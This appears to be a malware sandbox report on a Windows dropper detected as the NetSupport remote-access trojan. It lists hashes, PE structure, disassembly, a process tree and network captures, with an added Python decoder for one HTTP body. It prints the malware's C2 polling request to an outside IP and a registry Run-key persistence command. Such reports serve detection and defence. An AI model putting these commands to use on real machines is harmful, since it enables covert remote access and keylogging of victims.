                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):77224
                                                                                  Entropy (8bit):6.793971095882093
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
                                                                                  MD5:325B65F171513086438952A152A747C4
                                                                                  SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
                                                                                  SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
                                                                                  SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 13%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):15
                                                                                  Entropy (8bit):2.7329145639793984
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:QJgTG:QkG
                                                                                  MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                                                                  SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                                                                  SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
                                                                                  SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                                                                  Malicious:false
                                                                                  Preview:32.7767,-96.797
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.940330546772841
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:file.exe
                                                                                  File size:2'138'286 bytes
                                                                                  MD5:166d71e145b2c802acd2b0a07e070bad
                                                                                  SHA1:1c84d2e573e7096040fbe6e950fbff764aa11096
                                                                                  SHA256:33b22fce68d5d7bd08e86b8506c50bdfcd38c26db5983864e8d33bdf62f53272
                                                                                  SHA512:5137efaeda15554cf5b8ff68516d91b9cb3e960b85970f535e8735b1705f62cb390ffef4c7b964ed33764cd3b772aaca0ac1468ec67abe7fd2de9ddf2465f6e4
                                                                                  SSDEEP:49152:VIf3w6NbHHBp7k5hhJ+j0h7x0vRNT1UTzPN0EkHbG+n9:VIfwYt5ShrfKvo1U
                                                                                  TLSH:61A52302B9D3C5B2D53308350B196F55747DBE303F18CDAAE7C95E1EDA31292A628B63
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......
                                                                                  Icon Hash:1515d4d4442f2d2d
                                                                                  Entrypoint:0x41d779
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:00be6e6c4f9e287672c8301b72bdabf3
                                                                                  Instruction
                                                                                  call 00007FA10932700Fh
                                                                                  jmp 00007FA109326A03h
                                                                                  cmp ecx, dword ptr [0043A1C8h]
                                                                                  jne 00007FA109326B75h
                                                                                  ret
                                                                                  jmp 00007FA109327186h
                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                  mov eax, ecx
                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                  mov dword ptr [ecx+04h], 00430FE8h
                                                                                  mov dword ptr [ecx], 00431994h
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push esi
                                                                                  push dword ptr [ebp+08h]
                                                                                  mov esi, ecx
                                                                                  call 00007FA10931A10Dh
                                                                                  mov dword ptr [esi], 004319A0h
                                                                                  mov eax, esi
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  retn 0004h
                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                  mov eax, ecx
                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                  mov dword ptr [ecx+04h], 004319A8h
                                                                                  mov dword ptr [ecx], 004319A0h
                                                                                  ret
                                                                                  lea eax, dword ptr [ecx+04h]
                                                                                  mov dword ptr [ecx], 00431988h
                                                                                  push eax
                                                                                  call 00007FA109329D1Eh
                                                                                  pop ecx
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push esi
                                                                                  mov esi, ecx
                                                                                  lea eax, dword ptr [esi+04h]
                                                                                  mov dword ptr [esi], 00431988h
                                                                                  push eax
                                                                                  call 00007FA109329D07h
                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                  pop ecx
                                                                                  je 00007FA109326B7Ch
                                                                                  push 0000000Ch
                                                                                  push esi
                                                                                  call 00007FA109326142h
                                                                                  pop ecx
                                                                                  pop ecx
                                                                                  mov eax, esi
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  retn 0004h
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 0Ch
                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                  call 00007FA109326ADEh
                                                                                  push 00437B58h
                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                  push eax
                                                                                  call 00007FA109329406h
                                                                                  int3
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 0Ch
                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [C++] VS2015 UPD3.1 build 24215
                                                                                  • [EXP] VS2015 UPD3.1 build 24215
                                                                                  • [RES] VS2015 UPD3 build 24213
                                                                                  • [LNK] VS2015 UPD3.1 build 24215
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x38cd0 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x38d04 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5d000 | 0xe034 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0x1fd0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x36ee0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x31928 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x30000 | 0x25c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x38254 | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2e864 | 0x2ea00 | 8c2dd3ebce78edeed565107466ae1d3e | False | 0.5908595844504021 | data | 6.693477406609911 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x30000 | 0x9aac | 0x9c00 | b8d3a709e8e2861298e51f270be0f883 | False | 0.45718149038461536 | data | 5.133828516884417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3a000 | 0x213d0 | 0xc00 | 7a066b052b7178cd1388c71d17dec570 | False | 0.2789713541666667 | data | 3.2428863859698565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids | 0x5c000 | 0xe8 | 0x200 | 0a8129f1f5d2e8ddcb61343ecd6f891a | False | 0.33984375 | data | 2.0959167744603624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x5d000 | 0xe034 | 0xe200 | d62594e063ef25acc085c21831d77a75 | False | 0.6341779590707964 | data | 6.802287495720703 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6c000 | 0x1fd0 | 0x2000 | 983e78af74da826d9233ebaa3055869a | False | 0.8060302734375 | data | 6.687357530503152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x5d644 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | | | 1.0027729636048528
PNG | 0x5e18c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | | | 0.9363390441839495
RT_ICON | 0x5f738 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | | | 0.47832369942196534
RT_ICON | 0x5fca0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | | | 0.5410649819494585
RT_ICON | 0x60548 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | | | 0.4933368869936034
RT_ICON | 0x613f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | | | 0.5390070921985816
RT_ICON | 0x61858 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | | | 0.41393058161350843
RT_ICON | 0x62900 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | | | 0.3479253112033195
RT_ICON | 0x64ea8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9809269502193401
RT_DIALOG | 0x68c1c | 0x2a2 | data | | | 0.5296735905044511
RT_DIALOG | 0x68ec0 | 0x13a | data | | | 0.6624203821656051
RT_DIALOG | 0x68ffc | 0xf2 | data | | | 0.71900826446281
RT_DIALOG | 0x690f0 | 0x14e | data | | | 0.5868263473053892
RT_DIALOG | 0x69240 | 0x318 | data | | | 0.476010101010101
RT_DIALOG | 0x69558 | 0x24a | data | | | 0.6262798634812287
RT_STRING | 0x697a4 | 0x1fc | data | | | 0.421259842519685
RT_STRING | 0x699a0 | 0x246 | data | | | 0.41924398625429554
RT_STRING | 0x69be8 | 0x1dc | data | | | 0.5105042016806722
RT_STRING | 0x69dc4 | 0xdc | data | | | 0.65
RT_STRING | 0x69ea0 | 0x468 | data | | | 0.375
RT_STRING | 0x6a308 | 0x164 | data | | | 0.5056179775280899
RT_STRING | 0x6a46c | 0xe4 | data | | | 0.6359649122807017
RT_STRING | 0x6a550 | 0x158 | data | | | 0.4563953488372093
RT_STRING | 0x6a6a8 | 0xe8 | data | | | 0.5948275862068966
RT_STRING | 0x6a790 | 0xe6 | data | | | 0.5695652173913044
RT_GROUP_ICON | 0x6a878 | 0x68 | data | | | 0.7019230769230769
RT_MANIFEST | 0x6a8e0 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-16T12:41:03.602345+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.4 | 49730 | 45.61.128.74 | 443 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 16, 2024 12:41:03.602344990 CET | 49730 | 443 | 192.168.2.4 | 45.61.128.74
Nov 16, 2024 12:41:03.602385998 CET | 443 | 49730 | 45.61.128.74 | 192.168.2.4
Nov 16, 2024 12:41:03.602459908 CET | 49730 | 443 | 192.168.2.4 | 45.61.128.74
Nov 16, 2024 12:41:03.752183914 CET | 49730 | 443 | 192.168.2.4 | 45.61.128.74
Nov 16, 2024 12:41:03.752206087 CET | 443 | 49730 | 45.61.128.74 | 192.168.2.4
Nov 16, 2024 12:41:03.752365112 CET | 443 | 49730 | 45.61.128.74 | 192.168.2.4
Nov 16, 2024 12:41:03.818038940 CET | 49731 | 80 | 192.168.2.4 | 104.26.0.231
Nov 16, 2024 12:41:03.823124886 CET | 80 | 49731 | 104.26.0.231 | 192.168.2.4
Nov 16, 2024 12:41:03.823234081 CET | 49731 | 80 | 192.168.2.4 | 104.26.0.231
Nov 16, 2024 12:41:03.823355913 CET | 49731 | 80 | 192.168.2.4 | 104.26.0.231
Nov 16, 2024 12:41:03.828351974 CET | 80 | 49731 | 104.26.0.231 | 192.168.2.4
Nov 16, 2024 12:41:04.692912102 CET | 80 | 49731 | 104.26.0.231 | 192.168.2.4
Nov 16, 2024 12:41:04.693109989 CET | 49731 | 80 | 192.168.2.4 | 104.26.0.231
Nov 16, 2024 12:42:53.788378954 CET | 49731 | 80 | 192.168.2.4 | 104.26.0.231
Nov 16, 2024 12:42:53.794265985 CET | 80 | 49731 | 104.26.0.231 | 192.168.2.4
Nov 16, 2024 12:42:53.798243999 CET | 49731 | 80 | 192.168.2.4 | 104.26.0.231

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 16, 2024 12:41:03.804003954 CET | 50652 | 53 | 192.168.2.4 | 1.1.1.1
Nov 16, 2024 12:41:03.813798904 CET | 53 | 50652 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 16, 2024 12:41:03.804003954 CET | 192.168.2.4 | 1.1.1.1 | 0xfdb2 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 16, 2024 12:41:03.813798904 CET | 1.1.1.1 | 192.168.2.4 | 0xfdb2 | No error (0) | geo.netsupportsoftware.com | | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Nov 16, 2024 12:41:03.813798904 CET | 1.1.1.1 | 192.168.2.4 | 0xfdb2 | No error (0) | geo.netsupportsoftware.com | | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Nov 16, 2024 12:41:03.813798904 CET | 1.1.1.1 | 192.168.2.4 | 0xfdb2 | No error (0) | geo.netsupportsoftware.com | | 172.67.68.212 | A (IP address) | IN (0x0001) | false
                                                                                  • 45.61.128.74connection: keep-alivecmd=pollinfo=1ack=1
                                                                                  • geo.netsupportsoftware.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 45.61.128.74 | 443 | 7552 | C:\Users\Public\Public\Videos\Video\bild.exe

Timestamp | Bytes transferred | Direction | Data
Nov 16, 2024 12:41:03.752183914 CET | 216 | OUT | POST http://45.61.128.74/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 45.61.128.74
Connection: Keep-Alive
CMD=POLLINFO=1ACK=1
                                                                                  Data Raw:
                                                                                  Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.26.0.231 | 80 | 7552 | C:\Users\Public\Public\Videos\Video\bild.exe

Timestamp | Bytes transferred | Direction | Data
Nov 16, 2024 12:41:03.823355913 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                  Host: geo.netsupportsoftware.com
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
Nov 16, 2024 12:41:04.692912102 CET | 1110 | IN | HTTP/1.1 200 OK
                                                                                  Date: Sat, 16 Nov 2024 11:41:04 GMT
                                                                                  Content-Type: text/html; Charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  CF-Ray: 8e3735b63fb04677-DFW
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cache-Control: private
                                                                                  Set-Cookie: ASPSESSIONIDSSBQDBCQ=CPMJHFBAAKDHLDOGGJJCFIDG; path=/
                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                  Vary: Accept-Encoding
                                                                                  cf-apo-via: origin,host
                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hgusk%2BZLajdFXCEbxzRgeaoZ1PT3oUyxz2hbZP9e%2BACtWjTGHJob8KIXCXN7sl3eUpppU35WikOKiVcTLCHkWhQgGqcYS8dQMHALKh84gtq6Uq%2FvobM4AtWGq2i2lEofDewL%2F8UAHpNnwPNX"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1281&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: f32.7767,-96.7970   (the body is sent with chunked transfer encoding: a chunk-size line "f" (15 bytes), the 15-byte payload "32.7767,-96.797", then the terminating "0" chunk; the CR/LF bytes are dropped in this rendering, which is why the size digit and the final "0" appear fused to the payload)
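The raw bytes above only become readable once the chunked framing is removed. The following decoder is an added example, not Joe Sandbox code; the hex string is copied verbatim from the "Data Raw" line of the report, and everything else (function names, the strict error handling) is the editor's own choice for illustration.

```python
"""Decode the chunked HTTP body shown in the report's 'Data Raw' line.

Added example (not Joe Sandbox code).  DATA_RAW_HEX is copied from the report;
the function and its error handling are an illustration, not a library API.
"""
import binascii

# "Data Raw" bytes from the report, verbatim.
DATA_RAW_HEX = "66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a"


def decode_chunked(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body.

    Each chunk is '<hex-size>[;ext]\\r\\n<data>\\r\\n'; a size of 0 terminates.
    Truncated or malformed input raises ValueError rather than returning a
    partial payload, so a cut-off capture cannot be mistaken for a complete one.
    """
    out = bytearray()
    pos = 0
    while True:
        end = body.find(b"\r\n", pos)
        if end == -1:
            raise ValueError("missing chunk-size line")
        size_field = body[pos:end].split(b";", 1)[0].strip()  # drop chunk extensions
        try:
            size = int(size_field, 16)
        except ValueError:
            raise ValueError(f"bad chunk size: {size_field!r}") from None
        pos = end + 2
        if size == 0:
            # last-chunk; optional trailer headers and a blank line follow
            return bytes(out)
        chunk = body[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk data")
        out += chunk
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2


def decode_report_body(hex_dump: str = DATA_RAW_HEX) -> str:
    """Turn the report's space-separated hex dump into the decoded payload."""
    raw = binascii.unhexlify(hex_dump.replace(" ", ""))
    return decode_chunked(raw).decode("ascii")


if __name__ == "__main__":
    print(decode_report_body())
```

The decoded payload is a latitude/longitude pair, consistent with the request being a geolocation lookup of the sandbox's egress address; the raw dump in the report shows the framing bytes, the "Data Ascii" line does not.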


                                                                                  Target ID:0
                                                                                  Start time:06:41:00
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                  Imagebase:0x150000
                                                                                  File size:2'138'286 bytes
                                                                                  MD5 hash:166D71E145B2C802ACD2B0A07E070BAD
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:06:41:01
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:06:41:01
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:06:41:02
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
                                                                                  Imagebase:0xdc0000
                                                                                  File size:59'392 bytes
                                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:06:41:02
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                  Imagebase:0x2d0000
                                                                                  File size:105'848 bytes
                                                                                  MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4158412935.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000000.1717304165.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\bild.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 29%, ReversingLabs
                                                                                  • Detection: 49%, Virustotal, Browse
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:5
                                                                                  Start time:06:41:13
                                                                                  Start date:16/11/2024
